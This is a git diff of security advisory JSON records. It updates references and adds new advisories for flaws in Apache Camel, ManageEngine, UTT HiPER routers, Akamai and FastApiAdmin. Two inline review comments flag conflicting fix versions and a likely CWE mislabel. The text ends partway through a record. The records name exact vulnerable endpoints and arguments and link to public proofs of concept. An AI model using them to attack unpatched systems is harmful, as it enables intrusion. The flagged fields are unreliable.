a/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json b/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json index 788580add9950..7b636878464ee 100644 --- a/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json +++ b/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4m9-3fr6-f83p", - "modified": "2026-01-26T06:30:28Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T06:30:28Z", "aliases": [ "CVE-2026-1416" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/enocknt/gpac/commit/d45c264c20addf0c1cc05124ede33f8ffa800e68" }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342805" diff --git a/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json b/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json index 49fbd400503da..5c22a1f83a95b 100644 --- a/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json +++ b/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4xv-cr27-98cp", - "modified": "2026-01-29T15:30:27Z", + "modified": "2026-02-23T09:31:23Z", "published": "2026-01-29T15:30:27Z", "aliases": [ "CVE-2026-1587" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/issues/4272#issue-3795156752" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343350" diff --git a/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json b/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json index 0bbe4ae72600b..9729c269aa6c2 100644 --- a/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json +++ b/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q9fv-9fr9-69p3", - "modified": "2026-01-01T21:30:18Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-01T21:30:17Z", "aliases": [ "CVE-2025-15412" 
@@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/wabt/issues/2678" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/wabt" + }, { "type": "WEB", "url": "https://github.com/oneafter/1208/blob/main/af1" diff --git a/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json b/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json index 892fcee0ea54d..8bacd08b6c8fc 100644 --- a/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json +++ b/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qvgm-c3f9-m43m", - "modified": "2026-01-19T21:33:11Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T21:33:11Z", "aliases": [ "CVE-2026-1171" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/542" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341765" diff --git a/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json b/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json index f6f42b505f88b..31c3f5e75256e 100644 --- a/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json +++ b/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r58r-mmgc-mr7f", - "modified": "2026-01-26T03:30:34Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T03:30:34Z", "aliases": [ "CVE-2026-1415" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/enocknt/gpac/commit/af951b892dfbaaa38336ba2eba6d6a42c25810fd" }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342804" 
diff --git a/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json b/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json index 42db22f77be1f..9937f49a23485 100644 --- a/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json +++ b/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rcpp-qhfh-r47v", - "modified": "2026-01-10T15:31:22Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-10T15:31:22Z", "aliases": [ "CVE-2026-0821" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/quickjs-ng/quickjs/commit/c5d80831e51e48a83eab16ea867be87f091783c5" }, + { + "type": "WEB", + "url": "https://github.com/quickjs-ng/quickjs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.340355" diff --git a/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json b/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json index 3402670f11668..e9ea2825dc54e 100644 --- a/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json +++ b/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rf69-3jvx-93qp", - "modified": "2026-01-18T18:30:16Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T18:30:16Z", "aliases": [ "CVE-2026-1126" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1126" }, + { + "type": "WEB", + "url": "https://gitee.com/lwj/flow" + }, { "type": "WEB", "url": "https://gitee.com/lwj/flow/issues/IDIQSE" diff --git a/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json b/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json index ea1b0e5ab2107..e830fc4fd9686 100644 --- a/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json 
+++ b/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vrx4-99h7-rgjh", - "modified": "2026-01-02T06:30:26Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T06:30:26Z", "aliases": [ "CVE-2025-15430" diff --git a/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json b/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json index 179cfe8b3d34c..2be5f8370e2f1 100644 --- a/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json +++ b/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x3rh-6rvx-g8m2", - "modified": "2026-01-02T03:30:22Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T03:30:22Z", "aliases": [ "CVE-2025-15425" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.721352" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.734567" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json b/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json index 6388b9e8ca6bc..9dde97c659476 100644 --- a/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json +++ b/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xc7m-2p37-4qw2", - "modified": "2026-01-06T00:30:24Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-06T00:30:24Z", "aliases": [ "CVE-2026-0607" @@ -46,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.731697" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.738707" } ], "database_specific": { 
diff --git a/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json b/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json index 5a4c3473f43e3..4edbb07ef8cd6 100644 --- a/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json +++ b/advisories/unreviewed/2026/01/GHSA-xvvx-g2mg-wqw5/GHSA-xvvx-g2mg-wqw5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xvvx-g2mg-wqw5", - "modified": "2026-01-18T09:30:27Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T09:30:27Z", "aliases": [ "CVE-2025-15535" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/nicbarker/clay/issues/566" }, + { + "type": "WEB", + "url": "https://github.com/nicbarker/clay" + }, { "type": "WEB", "url": "https://github.com/oneafter/1215/blob/main/repro" diff --git a/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json new file mode 100644 index 0000000000000..74426455a29ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json 
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-429q-mrc4-38fr",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-25747"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in Apache Camel LevelDB component.\n\nThe Camel-LevelDB DefaultLevelDBSerializer class deserializes data read from the LevelDB aggregation repository using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. An attacker who can write to the LevelDB database files used by a Camel application can inject a crafted serialized Java object that, when deserialized during normal aggregation repository operations, results in arbitrary code execution in the context of the application.\nThis issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.5, from 4.15.0 before 4.18.0.\n\nUsers are recommended to upgrade to version 4.18.0, which fixes the issue. For the 4.10.x LTS releases, users are recommended to upgrade to 4.10.9, while for 4.14.x LTS releases, users are recommended to upgrade to 4.14.5",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25747"
+ },
+ {
+ "type": "WEB",
+ "url": "https://camel.apache.org/security/CVE-2026-25747.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oscerd/CVE-2026-25747"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T09:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json b/advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json
new file mode 100644
index 0000000000000..fe553a8e375e3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7jmh-rhmc-g5gq/GHSA-7jmh-rhmc-g5gq.json
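Review bot: The `details` text of the new GHSA-429q-mrc4-38fr record gives the 4.10.x affected range as `from 4.10.0 before 4.10.8` but then recommends upgrading to `4.10.9`, so a reader cannot tell whether 4.10.8 carries the fix. With `"affected": []` there is no machine-readable range to fall back on, and `"severity": []` leaves the record unscored, so tooling that matches on package ranges will presumably not flag it. The two version numbers should be reconciled against the linked camel.apache.org advisory before the record is used for patch decisions.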
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7jmh-rhmc-g5gq",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-1367"
+ ],
+ "details": "Zohocorp ManageEngine ADSelfService Plus versions 6522 and below are vulnerable to authenticated SQL Injection in the search report option.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1367"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.manageengine.com/uk/products/self-service-password/advisory/CVE-2026-1367.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T08:16:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json b/advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json
new file mode 100644
index 0000000000000..e63b5ad3a919f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9vfc-93vc-6ffp/GHSA-9vfc-93vc-6ffp.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9vfc-93vc-6ffp",
+ "modified": "2026-02-23T09:31:24Z",
+ "published": "2026-02-23T09:31:24Z",
+ "aliases": [
+ "CVE-2026-2981"
+ ],
+ "details": "A vulnerability was found in UTT HiPER 810G up to 1.7.7-1711. The affected element is the function strcpy of the file /goform/formTaskEdit_ap. The manipulation of the argument txtMin2 results in buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2981"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/7wkajk/CVE-VUL/blob/main/5.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/7wkajk/CVE-VUL/blob/main/5.md#poc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347365"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347365"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756131"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T09:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json
new file mode 100644
index 0000000000000..93f7774cb35fb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c3f3-cc42-xr9v",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-23552"
+ ],
+ "details": "Cross-Realm Token Acceptance Bypass in KeycloakSecurityPolicy Apache Camel Keycloak component. \n\nThe Camel-Keycloak KeycloakSecurityPolicy does not validate the iss (issuer) claim of JWT tokens against the configured realm. A token issued by one Keycloak realm is silently accepted by a policy configured for a completely different realm, breaking tenant isolation.\nThis issue affects Apache Camel: from 4.15.0 before 4.18.0.\n\nUsers are recommended to upgrade to version 4.18.0, which fixes the issue.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23552"
+ },
+ {
+ "type": "WEB",
+ "url": "https://camel.apache.org/security/CVE-2026-23552.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oscerd/CVE-2026-23552"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-346"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T09:17:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json b/advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json
new file mode 100644
index 0000000000000..a700e37c1726d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fhhg-8jv8-7rcw/GHSA-fhhg-8jv8-7rcw.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fhhg-8jv8-7rcw",
+ "modified": "2026-02-23T09:31:24Z",
+ "published": "2026-02-23T09:31:24Z",
+ "aliases": [
+ "CVE-2026-26365"
+ ],
+ "details": "Akamai Ghost on Akamai CDN edge servers before 2026-02-06 mishandles processing of custom hop-by-hop HTTP headers, where an incoming request containing the header \"Connection: Transfer-Encoding\" could result in a forward request with invalid message framing, depending on the Akamai processing path. This could result in the origin server parsing the request body incorrectly, leading to HTTP request smuggling.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26365"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.akamai.com/blog/security-research/cve-2026-26365-incorrect-processing-connection-transfer-encoding"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-444"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T09:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json b/advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json
new file mode 100644
index 0000000000000..1cdee802594d1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h4v7-f6v2-4hmm/GHSA-h4v7-f6v2-4hmm.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h4v7-f6v2-4hmm",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-2975"
+ ],
+ "details": "A security flaw has been discovered in FastApiAdmin up to 2.2.0. Affected by this vulnerability is the function reset_api_docs of the file /backend/app/plugin/init_app.py of the component Custom Documentation Endpoint. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2975"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347359"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347359"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756067"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T07:16:21Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json b/advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json
new file mode 100644
index 0000000000000..c8aec309a81ca
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m5p7-pf66-25qw/GHSA-m5p7-pf66-25qw.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m5p7-pf66-25qw",
+ "modified": "2026-02-23T09:31:24Z",
+ "published": "2026-02-23T09:31:24Z",
+ "aliases": [
+ "CVE-2026-2980"
+ ],
+ "details": "A vulnerability has been found in UTT HiPER 810G up to 1.7.7-1711. Impacted is the function strcpy of the file /goform/setSysAdm. The manipulation of the argument passwd1 leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2980"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/7wkajk/CVE-VUL/blob/main/4.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/7wkajk/CVE-VUL/blob/main/4.md#poc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347364"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347364"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756130"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T09:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json b/advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json
new file mode 100644
index 0000000000000..4c877d86dd857
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m879-6gvr-239v/GHSA-m879-6gvr-239v.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m879-6gvr-239v",
+ "modified": "2026-02-23T09:31:24Z",
+ "published": "2026-02-23T09:31:24Z",
+ "aliases": [
+ "CVE-2026-2979"
+ ],
+ "details": "A flaw has been found in FastApiAdmin up to 2.2.0. This issue affects the function user_avatar_upload_controller of the file /backend/app/api/v1/module_system/user/controller.py of the component Scheduled Task API. Executing a manipulation can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2979"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/fastapi-admin/vulnerability-5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347363"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347363"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756156"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T09:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json b/advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json
new file mode 100644
index 0000000000000..8d7d49f9fa66d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p2cq-gh8c-83cc/GHSA-p2cq-gh8c-83cc.json
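Review bot: `cwe_ids` in the new GHSA-m879-6gvr-239v record lists only `CWE-284`, although `details` describes an unrestricted upload in `user_avatar_upload_controller`; the specific weakness for that is CWE-434, and triage rules keyed on it will miss this entry. I would record both, `"cwe_ids": ["CWE-284", "CWE-434"]`, and the same applies to the GHSA-qmq9-8xrr-rx63 and GHSA-rgpr-47mq-rh3c records later in this patch. All three also name the component as "Scheduled Task API" while pointing at user, params and file controllers, which looks like templated upstream text and should be checked against the linked reports.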
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p2cq-gh8c-83cc",
+ "modified": "2026-02-23T09:31:23Z",
+ "published": "2026-02-23T09:31:23Z",
+ "aliases": [
+ "CVE-2026-2976"
+ ],
+ "details": "A weakness has been identified in FastApiAdmin up to 2.2.0. Affected by this issue is the function download_controller of the file /backend/app/api/v1/module_common/file/controller.py of the component Download Endpoint. This manipulation of the argument file_path causes information disclosure. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2976"
+ },
+ {
